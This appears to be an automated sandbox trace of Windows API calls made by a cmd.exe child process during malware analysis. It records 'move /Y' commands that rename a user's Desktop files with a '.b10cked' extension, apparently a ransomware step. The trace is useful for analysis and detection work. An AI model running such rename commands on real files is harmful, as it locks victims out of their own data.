[0220.714] GetConsoleOutputCP () returned 0x1b5 [0220.714] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.715] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.715] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.715] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.715] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.715] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.715] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.715] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.715] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.715] GetEnvironmentStringsW () returned 0x320168* [0220.716] FreeEnvironmentStringsW (penv=0x320168) returned 1 [0220.716] GetEnvironmentStringsW () returned 0x320168* [0220.716] FreeEnvironmentStringsW (penv=0x320168) returned 1 [0220.716] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e71c | out: phkResult=0x24e71c*=0x40) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x0, lpData=0x24e728*=0x90, lpcbData=0x24e720*=0x1000) returned 0x2 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x1, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x0, lpData=0x24e728*=0x1, lpcbData=0x24e720*=0x1000) returned 0x2 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x0, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x40, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x40, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x0, lpData=0x24e728*=0x40, lpcbData=0x24e720*=0x1000) returned 0x2 [0220.716] RegCloseKey (hKey=0x40) returned 0x0 [0220.716] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e71c | out: phkResult=0x24e71c*=0x40) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x0, lpData=0x24e728*=0x40, lpcbData=0x24e720*=0x1000) returned 0x2 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x1, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x0, lpData=0x24e728*=0x1, lpcbData=0x24e720*=0x1000) returned 0x2 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x0, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x9, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x9, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x0, lpData=0x24e728*=0x9, lpcbData=0x24e720*=0x1000) returned 0x2 [0220.716] RegCloseKey (hKey=0x40) returned 0x0 [0220.717] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.717] srand (_Seed=0x5b8863b6) [0220.717] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS\" \"C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked\"" [0220.717] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS\" \"C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked\"" [0220.717] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.717] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.717] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.717] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.717] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.717] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.717] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.717] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.717] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.717] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.717] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.717] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.717] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.717] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.718] GetEnvironmentStringsW () returned 0x3222b8* [0220.718] FreeEnvironmentStringsW (penv=0x3222b8) returned 1 [0220.718] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.718] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.718] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.718] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.718] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.718] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.718] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.718] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.718] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.718] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.718] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f4e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.718] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f4e8, lpFilePart=0x24f4e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f4e4*="Desktop") returned 0x18 [0220.718] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.718] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f264 | out: lpFindFileData=0x24f264) returned 0x31fff8 [0220.718] FindClose (in: hFindFile=0x31fff8 | out: hFindFile=0x31fff8) returned 1 [0220.718] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f264 | out: lpFindFileData=0x24f264) returned 0x31fff8 [0220.718] FindClose (in: hFindFile=0x31fff8 | out: hFindFile=0x31fff8) returned 1 [0220.718] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f264 | out: lpFindFileData=0x24f264) returned 0x31fff8 [0220.719] FindClose (in: hFindFile=0x31fff8 | out: hFindFile=0x31fff8) returned 1 [0220.719] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.719] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.719] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.719] GetEnvironmentStringsW () returned 0x322ad8* [0220.719] FreeEnvironmentStringsW (penv=0x322ad8) returned 1 [0220.719] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.719] GetConsoleOutputCP () returned 0x1b5 [0220.719] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.719] GetUserDefaultLCID () returned 0x409 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f628, cchData=128 | out: lpLCData="0") returned 2 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f628, cchData=128 | out: lpLCData="0") returned 2 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f628, cchData=128 | out: lpLCData="1") returned 2 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.720] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.721] GetConsoleTitleW (in: lpConsoleTitle=0x3108d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.721] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.721] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.721] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.721] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.722] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.722] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.722] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.722] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.722] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.722] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.722] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.724] GetConsoleTitleW (in: lpConsoleTitle=0x24f320, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.725] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.725] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.725] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.725] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.725] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.725] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.725] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.725] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.725] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.725] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.725] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.725] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.725] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.725] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.725] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.725] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.725] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.725] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.725] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.725] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.725] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.725] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.725] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.725] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.725] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.725] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.725] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.725] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.725] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.725] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.725] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.725] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.725] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.725] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.725] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.727] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.727] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.727] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f0dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f0d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f0d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.728] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.728] _wcsicmp (_String1="DCFT2D~1.OTS", _String2=".") returned 54 [0220.728] _wcsicmp (_String1="DCFT2D~1.OTS", _String2="..") returned 54 [0220.728] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS" (normalized: "c:\\users\\eebsym5\\desktop\\dcft2d~1.ots")) returned 0x20 [0220.728] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.728] SetErrorMode (uMode=0x0) returned 0x0 [0220.728] SetErrorMode (uMode=0x1) returned 0x0 [0220.729] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS", nBufferLength=0x104, lpBuffer=0x24ea64, lpFilePart=0x24ea4c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS", lpFilePart=0x24ea4c*="DCFT2D~1.OTS") returned 0x25 [0220.729] SetErrorMode (uMode=0x0) returned 0x1 [0220.729] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.729] _wcsicmp (_String1="DCFT2D~1.OTS", _String2=".") returned 54 [0220.729] _wcsicmp (_String1="DCFT2D~1.OTS", _String2="..") returned 54 [0220.729] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS" (normalized: "c:\\users\\eebsym5\\desktop\\dcft2d~1.ots")) returned 0x20 [0220.729] SetErrorMode (uMode=0x0) returned 0x0 [0220.729] SetErrorMode (uMode=0x1) returned 0x0 [0220.729] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS", nBufferLength=0x104, lpBuffer=0x24eee0, lpFilePart=0x24ec78 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS", lpFilePart=0x24ec78*="DCFT2D~1.OTS") returned 0x25 [0220.729] SetErrorMode (uMode=0x0) returned 0x1 [0220.729] SetErrorMode (uMode=0x0) returned 0x0 [0220.729] SetErrorMode (uMode=0x1) returned 0x0 [0220.729] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked", nBufferLength=0x104, lpBuffer=0x24f0e8, lpFilePart=0x24ec78 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked", lpFilePart=0x24ec78*="dcFt2Dy7M6d8J9.ots.b10cked") returned 0x33 [0220.729] SetErrorMode (uMode=0x0) returned 0x1 [0220.729] SetLastError (dwErrCode=0x0) [0220.729] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\dcft2dy7m6d8j9.ots.b10cked")) returned 0xffffffff [0220.729] GetLastError () returned 0x2 [0220.729] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x24e5f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e5f4) returned 0x310f08 [0220.729] FindNextFileW (in: hFindFile=0x310f08, lpFindFileData=0x24e5f4 | out: lpFindFileData=0x24e5f4) returned 0 [0220.730] GetLastError () returned 0x12 [0220.730] FindClose (in: hFindFile=0x310f08 | out: hFindFile=0x310f08) returned 1 [0220.731] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x321ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321ae0) returned 0x310f08 [0220.731] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked", nBufferLength=0x104, lpBuffer=0x24e88c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked", lpFilePart=0x0) returned 0x33 [0220.731] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots", nBufferLength=0x104, lpBuffer=0x24e88c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots", lpFilePart=0x0) returned 0x2b [0220.731] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots" (normalized: "c:\\users\\eebsym5\\desktop\\dcft2dy7m6d8j9.ots")) returned 0x20 [0220.731] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots" (normalized: "c:\\users\\eebsym5\\desktop\\dcft2dy7m6d8j9.ots"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\dcft2dy7m6d8j9.ots.b10cked"), dwFlags=0x3) returned 1 [0220.731] FindClose (in: hFindFile=0x310f08 | out: hFindFile=0x310f08) returned 1 [0220.732] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24e840 | out: _Buffer=" 1") returned 9 [0220.732] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.732] GetFileType (hFile=0x7) returned 0x2 [0222.927] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0222.927] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24e7cc | out: lpMode=0x24e7cc) returned 1 [0222.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.928] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24e800 | out: lpConsoleScreenBufferInfo=0x24e800) returned 1 [0222.928] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0222.928] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x24e840 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0222.928] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24e824, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x24e824*=0x1a) returned 1 [0222.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.929] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0222.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.929] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0222.929] _get_osfhandle (_FileHandle=0) returned 0x3 [0222.929] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0222.929] SetConsoleInputExeNameW () returned 0x1 [0222.929] GetConsoleOutputCP () returned 0x1b5 [0222.929] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0222.929] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.929] exit (_Code=0) Process: id = "578" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e00" os_pid = "0xedc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG\" 